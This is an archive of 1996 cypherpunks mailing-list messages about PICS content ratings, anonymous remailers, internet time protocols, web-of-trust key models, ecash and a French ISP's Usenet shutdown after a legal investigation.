actually illegal (various statutes on misuse of computer resources are 
quoted).

I don't know about posting the agreement. My lawyer may not want to see all 
his hard work in the public domain. I will ask.

	-Lance

-------------------------------------
Lance Cottrell   loki@infonex.com
President Infonex Internet Services
http://www.Infonex.com
-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 10 May 1996 20:27:14 +0800
To: vznuri@netcom.com>"
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <9605092113.AA13795@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>        I see it as an author provided a value added service to his content
>same as anyone else.
        
        In fact, 3rd party services may have problems with large and dynamic
WEB sites (in which case they just might rate it high, and rate the whole
directory.) (I was thinking about this with regards to incorporating rating
systems into WEB site managements tools and apps...) If MICS and signatures
do become prevalent, an easy way I can defeat ratings I don't like (or to
keep from others rating me) is to repeatedly change my content in some
simple way, throwing off their MICS.

_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 21:34:49 +0800
To: cypherpunks@toad.com
Subject: Publicity on PICS
Message-ID: <01I4ID8CLHOK8Y5B50@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The following may give an example of how companies and governments want
PICS to be used, instead of how it should be used (market-based ratings not
for censorship).
	-Allen

>Copyright 1996 Nando.net
>Copyright 1996 Reuter Information Service

>PARIS (May 9, 1996 12:41 p.m. EDT) -- A consortium of leading computer firms
>launched a global rating system Thursday enabling parents to shield their
>children from sexually explicit and violent material on the Internet.

>The firms also hope the system will protect them from angry governments who
>blame the largely unpoliced international computer network for bringing
>pornographic material across their electronic borders.

>"We do believe it will provide legal protection in a situation where adult
>material is being distributed to minors," said Andrew Gray, European general
>manager of CompuServe. "It will very much strengthen our position in these
>kind of situations."

>The system, an industry standard known as PICS -- for Platform for Internet
>Content Selection -- has been in the works for nearly a year, and will take
>several more months to become a useful tool for parents and educators, its
>primary targets.

>Under the system, 39 internet-related firms including giants America Online,
>CompuServe, Microsoft, Prodigy and Netscape Communications will soon give
>their customers software enabling them to block access to material they
>judge objectionable on the Internet's Worldwide Web.

>The software will enable parents and teachers to filter out pages according
>to their own choice of level of violence, sex, nudity and language.

>At the same time, providers will be urged to rate their pages by filling out
>an electronic questionnaire resulting in a "grade" for each site, on a scale
>ranging from zero, the most innocuous, to four for each category.

	What was I saying about pressure to rate?

>The system depends for its ratings on voluntary compliance by Internet
>providers. However parents will also have the option of simply blocking out
>all unrated pages, simply by checking an electronic box on their computer
>screens.

	This is, of course, assuming that "Internet content providers" won't
simply rate their pages as suitable for all ages.

[...]

>But there is no way to use the system to seek out pornography or violence on
>the web, officials insisted.

	Yeah, right.

>"To content-providers, I would say, 'Rate your sites' To parents I would
>say, 'Set the levels for your children.' And to governments, I would say
>humbly, 'Think again before censoring the net,"' Stephen Balkam, executive
>director of the Recreational Software Advisory Council, told a news
>conference.

	Note again the pressure for self-rating.

>"CompuServe supports selection and not censorship, empowerment and not
>restriction," Gray said, announcing that his firm would begin distributing
>the necessary software to customers in July.

>Netscape, whose Netscape Navigator Internet-browsing software is the most
>widely used in the world, will begin offering a new version incorporating
>the ratings capability by the end of the year, Technology Director Martin
>Haeberli said.

>"Parents and educators must have some way, some tool, to enable them to
>moderate what is available," Haeberli said.

	Only if you approve of parental censorship.

>Internet firms around the globe have been under the gun from governments to
>better police their offerings that offend local sensibilities, which vary
>considerably from country to country.

>A strength of PICS is that "it allows as many countries as would like to set
>up a rating system," said Jim Miller, a research scientist who helped
>develop the system. Adhering to the system would still be up to individual
>households, however.

	Whatever became of market-ratings? Admittedly, they may mean that each
country will be encouraged to given an example system... but I still don't
like the idea of government involvement.

[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 20:32:09 +0800
To: cypherpunks@toad.com
Subject: Compu$erve, Netscape offering Lotus Notes competitor
Message-ID: <01I4IDJBJNH48Y5B50@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	There is no mention in either of these articles about what encryption
protection will be used; it does appear that Netscape Navigator software will
be used, which does have some protections (very little for the out-of-US stuff,
of course). Jeff?
	-Allen

>Copyright 1996 Nando.net
>Copyright 1996 Bloomberg

>COLUMBUS, Ohio (May 9, 1996 12:41 p.m. EDT) -- CompuServe Corp. this fall
>will offer corporate customers Netscape Communications Corp. software used
>to share documents over computer networks.

>The move presents another challenge to International Business Machines
>Corp.'s Lotus Notes software, whose popularity has declined as companies opt
>for cheaper Internet software capable of many of the features Notes offers.

>Using Netscape's software, company employees and partners in distant offices
>can exchange and work on documents at the same time. Netscape also is
>developing audio and video technology that will let employees talk to each
>other.

[...]

>Columbus, Ohio-based CompuServe already offers Lotus Notes and decided to
>strike an agreement with Netscape because customers were asking for a
>similar, cheaper product.

[...]

>CompuServe will offer Netscape's server software, used to relay information,
>and Internet browsing software. Terms of the marketing and development
>agreement weren't disclosed.

>Netscape's software is based on technology it acquired with the purchase
>last year of Collabra Software Inc.

[...]

>Copyright 1996 Nando.net
>Copyright 1996 Reuter Information Service

>COLUMBUS, Ohio (May 9, 1996 12:47 p.m. EDT) - CompuServe Corp. and Netscape
>Communications Corp. said Thursday they will jointly create a managed
>intranet service that will allow a company's employees to communicate over
>in-house computer networks.

[...]

>Intranets refer to private corporate networks that are designed to make use
>of Internet software tools.

>Under the strategic partnership, the two firms will offer so-called
>groupware, a category of software that allows employees to share
>applications and electronic mail. They will manage such networks on behalf
>of corporate customers.

>Customers will have access to features such as electronic mail, online
>discussion groups and document-sharing that allow them to share and
>co-develop information in new ways.

>The service is slated to be available this fall, using Netscape's Navigator
>browser and server software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 May 1996 02:25:57 +0800
To: nyap@mailhub.garban.com (Noel Yap)
Subject: Re: time services on the Net
Message-ID: <199605100039.RAA00738@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 5/7/96 -0400, you wrote:
>I'm in need of a time service available over the Internet.
>Time-stamping is a plus, but the actual time (GMT, local, ...)
>is more important.  Does anyone have, or know of where I
>can find, a list of these services?

Check out http://www.clock.org/clock.org.html and
http://tycho.usno.navy.mil/ for more information.

There are some standard TCP/IP protocols for time.
You can check the RFCs for more information on them,
and look in whatever your operating system calls the "services" file.

There's a simple "daytime" protocol which gives the time in
hours:minutes:seconds at 1-second resolution, in ASCII or
binary, over TCP or UDP.  It's dumb, but it works fine
if that's enough resolution for you, and there are programs
to set your system clock based on it, such as rdate for Suns
and wsntime for Winsock.  

There's a far fancier protocol called NTP, the Network Time Protocol,
which is a multi-tiered time protocol with servers and clients
and mutual agreement and adjustment for round-trip delay and such.
Depending on the quality of your network connections, it can
be accurate to very fine time resolutions.

It's good form for ISPs to support NTP, both to keep their
clocks synchronized and to feed time to their clients,
but not all of them do that.  It's also good form for ISPs to
keep _all_ their machines in sync, not just most of them,
as occasionally happens at (ahem) some large well-known ISPs,
especially if they're going to bill for prime/nonprime time...
Another motivation is so that tycho.usno.navy.mil and its
friends tick and tock.usno.navy.mil only get hit by a few
thousand ISPs instead of potentially millions of individuals.

Ask your ISP's administrators what they do about clock sync,
unless of course you _are_ the administrator, or your ISP
takes three weeks to respond to tech support questions like
the (ahem) large well-known ISP not named above.
I currently use wsntime to sync off cesium.clock.org because
my ISP has reconfigured their time service and takes
weeks to respond to tech support quetions, but I was using
the ISP directly for a while.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 21:21:16 +0800
To: loki@infonex.com
Subject: Re: Remailer in a box
Message-ID: <01I4IDOS8GT88Y5B50@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@infonex.com"  9-MAY-1996 00:59:47.21

>This could be done with a trivial modification to the source and
>destination blocking lists (just change the sense of the checking).

	In other words, just change them from blocking to allowance? How much
technical knowledge does this take? I can see doing the incoming with procmail.

>Cyberpass (www.cyberpass.net) offers UNIX accounts without dialin access
>for $7 per month. These are available anonymously, and can be paid for with
>ecash.

	Interesting. Having ones at other than c2.org is useful for backup
purposes.

>Yes, but I only give it to remailer operators. The "bramble" might get
>flooded otherwise. Operators see the repercussions of their actions.

	Does it use how busy the remailer is to determine the approximate
frequency of the messages, or does it just keep on going with whatever you tell
it?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 21:14:59 +0800
To: loki@infonex.com
Subject: Re: Remailer in a box
Message-ID: <01I4IDYWGXEQ8Y5B50@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@infonex.com"  9-MAY-1996 00:59:47.21

>Cyberpass (www.cyberpass.net) offers UNIX accounts without dialin access
>for $7 per month. These are available anonymously, and can be paid for with
>ecash.

	After taking a look at www.cyberpass.net, I can see why you're
encoraging people to use it - about like Sameer encouraging people to use
c2.org. Your work on remailers does give you some reputation capital, however.
The signup form isn't very clear about anonymnity, BTW - I suggest dividing it
into optional and mandatory sections, and stating what will be the policy for
a lack of the optional ones. What's the 17- vs 18 differentiation for?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 21:21:22 +0800
To: E.J.Koops@kub.nl
Subject: Re: Cyberspace--Silencing the Net
Message-ID: <01I4IEFM2UW88Y5B50@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Interesting that they're a very liberal organization with the guts -
unlike, say, CPSR - to condem German censorship of Neo-Nazis. Their information
on that is incomplete, however; Declan and Rich may wish to contact them and
give them the whole story.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Sat, 11 May 1996 08:50:38 +0800
To: "'vznuri@netcom.com>
Subject: RE: self-ratings vs. market ratings
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960510012559Z-23475@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Not an extremely important point, but I just re-read my earlier message
and realized that my sentence below didn't exactly state what I meant:

	"I myself don't pay much attention to ratings, 
	as my own measures of things & people tend to be
	quite different from most, and therefore not very useful for my
purposes."

I meant that the the *ratings* would not be very useful for my purposes
(at least, not the ratings as I've heard proposed so far.)   I probably
wouldn't have the same values or concerns of those who feel the need to
apply them; I wouldn't judge the material by the same standards (raters
are looking principally to create a means to censor material, and I
myself am not concerned about passive text&graphics.  When Java applets
begin to coerce cybersurfers into complicity, I'll start worrying about
it.)

One more word about automating ratings:

The more automated that filtering becomes, so that the viewer (be it an
adult or a child) requires less and less personal involvement in
evaluating what is appropriate (or even interesting) for themselves, the
more weak & piddly (ignorant & psychologically dependent) those people
could become, falling into the habit of having others - or an automatic
robocop - do their content-filtering for them.   Not a good system to
introduce into a dynamic world-order.  Like all automatic things, it can
encourage intellectual lassitude.  Like all tools, this one can also be
misemployed.

But, of course, surfers can make a cultural decision:  sex&violence?  or
namby-pamby? :>)

    ..
Blanc
One voice among many.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 22:48:43 +0800
To: reagle@MIT.EDU
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4IG2VJRNI8Y5B50@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@MIT.EDU"  "Joseph M. Reagle Jr."  9-MAY-1996 15:07:09.24

>        I've figured out where my differences between myself and others
>lay. The _only_ system and service that I am aware of that is distributing
>PICS labels is RSAC. (http://www.rsac.org) They are what one could call an
>objective and non-arbitrary content rating system rather than an
>"appropriateness" system. "Appropriateness" systems will be valuable 3rd
>party systems when the vigilantes and fundamentalists wish to create label
>bureaus. For self labeling, if many people (main stream people) are going to
>use that system within their browser, it will have to have mind share. If
>it's going to have mind share, I think it would be advantegeous to it to be
>a descriptive label rather than "appropriate." Hence, much of the concerns
>I'm hearing aren't so worrisome to me.

	While that they aren't going for "this isn't appropriate" is to their
credit, they do have a lot of problems with the nonsensical nature of some
of their ratings; take a look at the definitions, for instance. (It's also
obvious that they simply copied them from their ratings of video games. A lot
of their HTML references for the definitions are messed up, incidentally.)
	A. In regards to aggressive violence, they appear to rate self-defense
as aggressive violence.
	B. They do _not_ rate depictions of violent games such as football and
rugby as aggressive violence.
	C. They define any sex between someone under 18 and someone above 18
as a "sex crime" - despite that the age for statutory rape varies considerably,
and is usually _below_ 18. They're thus defining it in the same category as
rape.
	D. They define bestiality, even if consensual, as a "sex crime." Again,
they're thus defining it in the same category as rape.
	E. They define "Any portrayal (words, speech, pictures, etc.) which
strongly denigrates, defames, or otherwise devalues on the basis of race,
ethnicity, religion, nationality, gender, sexual oriention, or disability" as
"hate speech." This has to be the most PC definition I've seen in a while. If I
mention that someone is a Scientologist, and that their opinions are likely to
be unjustified because of this, then I've committed "hate speech" under this
definition. If I say that someone who is less intelligent - a disability - is
of lesser value in the long run, I've committed "hate speech" under this
definition. In other words, they're encouraging parents and others to block
out speech that isn't PC. I will give them credit for mentioning "honkey" as
an epithet; most PC types seem to cheer on non-white racists like the Nation
of Islam. (There, I just committed hate speech against the Nation of Islam -
I attempted to bring down their reputation.)
	F. They also define any "hate speech" that "advocates violence or harm"
as "Extreme Hate Speech" - which gets the highest rating. Somehow, I doubt that
they're going to want to rate pro-Affirmative-Action speech - advocating harm
to those not in the protected groups - as "Extreme Hate Speech."
	In other words, while they've got some good ideas (as you point out,
unlike the SafeSurf system they don't attempt to have a category for "overall
appropriate range"), they've got a lot more messed-up ones. I don't think I'll
be rating any of my content with them anytime soon, thank you very much. They'd
misclassify it as "hate speech" or "extreme hate speech" or some such nonsense.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 11 May 1996 07:29:33 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Cyberspace--Silencing the Net
In-Reply-To: <01I4IEFM2UW88Y5B50@mbcl.rutgers.edu>
Message-ID: <199605100159.SAA00942@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	Interesting that they're a very liberal organization with the guts -
> unlike, say, CPSR - to condem German censorship of Neo-Nazis. Their information
> on that is incomplete, however; Declan and Rich may wish to contact them and
> give them the whole story.
> 	-Allen


What organization are you referring to that doesn't like censorship
of racists?  And how has CPSR acted to appear soft on censorship?

Anyone can find out more about national socialist ideology through
Nizkor, which has megs of racist essays in our own words.

A recommended directory is:
ftp://nizkor.almanac.bc.ca/pub/people/k/kleim.milton/


__
qut, cryptoracist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 10 May 1996 16:24:10 +0800
To: managerfb@cdnow.com
Subject: www.cdnow.com accepts ecash
Message-ID: <199605091714.TAA06142@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Cool.  Get your fresh CD's via WWW and UPS.  Pay with Mark 
Twain ecash.


This is the first thing (excepting, of course, BAP, cyberbuck
gambling, and pornography) that I actually want to buy with
ecash.


And I spend time crawling www.cdnow.com even when I don't
want to spend money, just to read the words and look at the
pictures.


http://www.cdnow.com/


This has been a public service announcement.  CDNow is not
paying me.  (Although, of course, they are welcome to send
me some free CD's in return for my kind words...)


Bryce

Disclaimer:  NO.  I'm not speaking for anyone else.  Not 
even the company mentioned in the From: line.

PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZIn9EjbHy8sKZitAQELPAL9G6lYkqhbTdYrt0YFe4VjF9jyyjxznCi2
SY3f86o2XvD86AMUQkVT31GhQAmGC6TN2cJ0pQDRpHfh5Qk+IZFgd3iyEEZqzrmc
UztgRNEhaIFgYXjV33gzRE5sk+fnpQaL
=H96X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 11 May 1996 07:40:12 +0800
To: rpowell@algorithmics.com
Subject: Re: remailer@utopia.hacktic.nl down
In-Reply-To: <96May9.135632edt.20486@janus.algorithmics.com>
Message-ID: <199605100215.TAA04043@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> >>>>> qut@netcom.com (Dave Harman) writes:
> 
>     >> Alex de Joode wrote:
>     >> > 
>     >> > Due to recent events the Hacktic Foundation has decided to
>     >> > discontinue its remailing operations, the remailer that is
>     >> > operated by the Hacktic Foundation will cease to exist May
>     >> > 20th.
>     >> 
>     >> Co$, I'll wager.  Just shows to go ya.
> 
>     > Perhaps Co$ was behind the recent spamming of
>     > alt.politics.white-power.  Scientology is 
>     > virulently anti-racist.
> 
> Interesting, given that Massah Elron (L. Ron Hubbard) was virulently
> racist.  

Just check out www.theta.com for examples of wiesenthalien anti-racism.

Oh, in what way was Elrom racist? (he's not anti-asian or anti-semitic,
for instance)



__
qut, cypheracist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 22:33:45 +0800
To: llurch@networking.stanford.edu
Subject: Re: Transitive trust and MLM
Message-ID: <01I4IHRSE6Q88Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves"  8-MAY-1996 04:33:21.44

>The fact that you're sending postcards is only a problem if you don't want
>them to be read. It's more the email I receive that I worry about, so all 
>my friends use the address rich@alpha.c2.org now.

	How would this help? Whoever's wanting to monitor you will just monitor
rich@alpha.c2.org's incoming mail.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 01:12:57 +0800
To: shamrock@netcom.com
Subject: Re: PGP, Inc.
Message-ID: <01I4IHTM3WME8Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"shamrock@netcom.com"  8-MAY-1996 11:06:21.74

>Since VeriSign is going to issue certs for nyms for free, the only
>requirement being uniqueness, using their certs might not prove much of a
>problem.

	I can see some fascinating legal questions with what, exactly, a
VeriSign certificate obligates the company for. Digital signature laws should
get interesting - any application of this to the Utah one?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 21:31:33 +0800
To: tcmay@got.net
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4II05OT188Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  8-MAY-1996 16:30:16.71

>Then we'll see what happens. (This is an old debate, here and on the
>Cyberia-l list, to wit, what happens when people/perverts/libertarians
>choose to subvert the voluntary ratings by deliberately mis-rating their
>stuff? Or what if they genuinely believe, a la NAMBLA, that youngsters
>should be exposed to certain things?)

	I don't agree with NAMBLA, BTW, in case anyone is wondering...

>I say it's a waste of our time to even be thinking or worrying about how to
>implement an infrastructure for ratings. In fact, building such an
>infrastructure could make later imposition of "mandatory voluntary ratings"
>(Orwell would be unsurprised) a greater likelihood.

	Quite. There's also the misuse of it by other countries to do
filtration (Chinese firewall et al). While this isn't an argument that having
it is something that shouldn't be permitted, it's a consideration that those
constructing some such system should keep in mind. I haven't seen any evidence
that either RCIS (sp?) or SafeSurf have done so.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 10 May 1996 21:43:10 +0800
To: jay_haines@connaught-usa.com (Jay Haines)
Subject: Re: remailer-in-a-box
In-Reply-To: <n1380577627.55178@flu.connaught-usa.com>
Message-ID: <199605100044.TAA17401@homeport.org>
MIME-Version: 1.0
Content-Type: text



Jay Haines wrote:

| Does one exist for the MAC? If not, would anyone be interested enough to see
| one developed?

	One doesn't exist; I think it would be great to see one.  I'd
offer to be a beta site.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 22:44:32 +0800
To: raph@cs.berkeley.edu
Subject: Re: Transitive trust and MLM
Message-ID: <01I4IICIVOMA8Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"raph@cs.berkeley.edu"  "Raph Levien"  8-MAY-1996 23:28:14.30

>   Now we can actually evaluate the probability of a given key being
>good. Consider a Monte Carlo process in which each edge in the graph is
>present with probability 1-p. For each run, we determine whether the
>recipient's public key (actually the binding between public key and
>recipient's e-mail address) is reachable from our trust root. The
>probability over a large number of runs is (given our assumptions) the
>probability of the key being good.
>   One encouraging consequence of this model is that densely connected
>subgraphs can result in highly trusted keys even if p itself is quite
>small. In a clique of size k, the trust is (very) roughly 1-(1-p)^k. For
>example, if p is a mere 50%, then in a clique of size 10, each key in
>the clique is trusted with a probability of 99.9%.

	Hmm.... I've got the problem with this that the measure you're using
is really good for creating an _upper bound_ for how trustworthy a given key
is - not for how trustworthy it actually is. In other words, a key that has
your, Lance Cottrell (sp?), Black Unicorn's, and TCMay's signatures on it is
pretty reliably determined (at least to me) as being that of whom they say it
is - but that isn't equivalent to how good the person is at determining other
key linkages. It's an upper bound on how good the person is - if you don't
trust a key as not having been compromised (due to a lack of key signatures),
you aren't going to rate it highly as an introducer.
	The interesting question is what relation to this upper bound (and to
other characteristics of the web, such as the degree of mutual signatures in a
chain) the actual introducer trustworthiness has.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 10 May 1996 21:20:32 +0800
To: reagle@MIT.EDU
Subject: Re: Applicable Models for Trust Calculations (Re: Dempster-ShaferTheory and Belief Networks (Re: Transitive trust))
Message-ID: <01I4III0F1I08Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@MIT.EDU"  "Joseph M. Reagle Jr."  9-MAY-1996 18:30:11.78

>The very term "Web of Trust" makes one pause with respect to independent
>events.

	Quite. Keys signed by an individual who turns out to be untrustworthy
may very well be keys of nyms of that individual; under many circumstances,
all are trustworthy or none are trustworthy.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 11 May 1996 07:52:07 +0800
To: cypherpunks@toad.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <adb7fc9806021004e41c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 5/9/96, E. ALLEN SMITH wrote:
>From:   IN%"tcmay@got.net"  8-MAY-1996 16:30:16.71
>
>>Then we'll see what happens. (This is an old debate, here and on the
>>Cyberia-l list, to wit, what happens when people/perverts/libertarians
>>choose to subvert the voluntary ratings by deliberately mis-rating their
>>stuff? Or what if they genuinely believe, a la NAMBLA, that youngsters
>>should be exposed to certain things?)
>
>        I don't agree with NAMBLA, BTW, in case anyone is wondering.

No need for people to point this out, as my point was an hypothetical, to
show that there simply _is no objective standard_ in such matters.

For every proposed "ratings" system that involves value judgments about who
should see something, I can think of examples where a quite opposite view
is held.

I still think we are being led down a dangerous path in trying to architect
ratings systems. As I said, we don't rate written words (at least I don't),
we don't rate newspapers, etc.

If a system gets built into the WWW, as with proposals for PICS, it _will_
be used by those who want to control content. We should think twice before
helping in any way.

(No, I'm not _against_ private ratings services...but this has little to do
with _me_, and I won't participate. More importantly, I won't have my
content have any kind of tag attached! Thus, the PICS thing looks intrusive
to me, and not at all what I think of as a "private ratings service." I'll
elaborate if my point is unclear.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 11 May 1996 02:33:29 +0800
To: loki@obscura.com
Subject: Re: Remailer in a box
Message-ID: <01I4IIMHQ67Y8Y5BAX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@obscura.com"  "Lance Cottrell"  9-MAY-1996 18:58:23.21

On Thu, 9 May 1996, E. ALLEN SMITH wrote:

>> 	After taking a look at www.cyberpass.net, I can see why you're
>> encoraging people to use it - about like Sameer encouraging people to use
>> c2.org.

>Guilty

	No problem. Modesty is an overrated virtue.

>I am not pushing the anonymous accounts until my laywer finishes the user 
>agreement for them. It is a bit of a tricky document (Sameer, want a copy 
>when it is done?). The whole site is days away from a complete redesign, 
>so I am not putting much effort into the current interface. Thanks for 
>the suggestions though.

	I suspect that the legal types on cypherpunks would be interested in
seeing it. Quite welcome on the suggestions.

>The >= 18 condition is to cover my butt. Since minors can not be parties 
>to contracts, I have no protection with them as clients. I am only a 
>provider for adults, and they take full responsibility for any children 
>allowed to use the connection. Fuck the CDA, but keep an eye on its claws.

	I see your difficulty. It is an additional one with respect to
anonymous accounts. Hmm... you could put the burden on other ISPs by only
having anonymous accounts via telnet access - and not accepting such from
k12.edu domains. Bit of a limit, though.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gep2@computek.net (by way of frantz@netcom.com (Bill Frantz))
Date: Sat, 11 May 1996 11:41:55 +0800
To: cypherpunks@toad.com
Subject: Internet en danger
Message-ID: <199605100300.UAA23831@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You think we're having problems here in the USA with the idiotic CDA, right?  I 
just received the following message from a colleague and friend who operates a 
large ISP in Paris, France.  The translation is mine, and I can't assure its 
total accuracy, (anyone who sees an error on my part, please correct it for
me). 
 I'm leaving the original French so that the original intent of the message can 
be viewed.


<---- Begin Forwarded Message ---->
Return-Path: opinions@storm.certix.fr
Date: Thu, 9 May 1996 19:42:12 +0200
From: Communication client <opinions@storm.certix.fr>
To: gep2@storm.certix.fr
Subject: Internet en danger

>                               Cher(e)s abonne(e)s,

Dear Subscribers,

>             Nous n'avons malheureusement plus la possibilite de vous
laisser acceder au service de News.  Exception faite des news 
world-net.communnaute, world-net.support, fr.network.internet.

Unfortunately, we no longer have the possibility to let you access Usenet. The 
only exceptions are the newsgroups "world-net.communnaute",
"world-net.support", 
and "fr.network.internet".

>     En effet, la justice francaise rend actuellement World-Net responsable de 
tout ce qui est diffuse sur Internet ; j'ai ete personnellement, en tant que 
responsable de World-Net, mis en examen hier parce que des images a caractere 
pedophile, venant de l'autre bout du monde etaient accessibles par notre
service 
de News. Aujourd'hui les news, demain peut-etre le web.

The French courts currently hold World-Net responsible for everything which is 
distributed on the Internet;  I was personally, as director of World-Net, 
interrogated yesterday because some pedophile images, coming from the other end 
of the world, were accessible through our News server.  Today Usenet, tomorrow 
perhaps the Web.

> La majorite d'entre vous connait le fonctionnement du reseau Internet et
sait bien que World-Net n'est que votre transporteur sur ce reseau.
Cependant nous n'avons pas le choix. 

The majority of you understand the functioning of the Internet network and 
clearly realize that World-Net provides merely your access to this network.  
It's not a matter of our choice.

>   Nous diffuserons sur notre serveur Web l'ensemble des informations citees 
dans la presse et a la television concernant ce dossier.

We will distribute via our Web server complete information as cited in the
press 
and on television concerning this whole affair.

>   Si vous voulez soutenir World-NET, envoye un mail de soutien a 
opinions@worldnet.net.

If you want to support World-NET, send a mail message of support to 
"opinions@worldnet.net".
                                                                            
>     Sebastien Socchard
 Directeur de World-Net.

(director of World-Net)



>Ci-joint le communique de presse de l'A.F.P.I., que nous remercions pour leur 
soutient :

Here is the press release from the A.F.P.I., which we thank for their support:


>COMMUNIQUE DE PRESSE DE L'A.F.P.I.
      Association FranÁaise des Professionnels d'Internet 

PRESS RELEASE FROM THE A.F.P.I.
      French Association of Internet Professionals


>                    Mardi 7 Mai 1996 

Tuesday, May 7, 1996

>  Affaire: Newsgroups/Pedophilie/Internet: deux dirigeants en gardes a
vue.

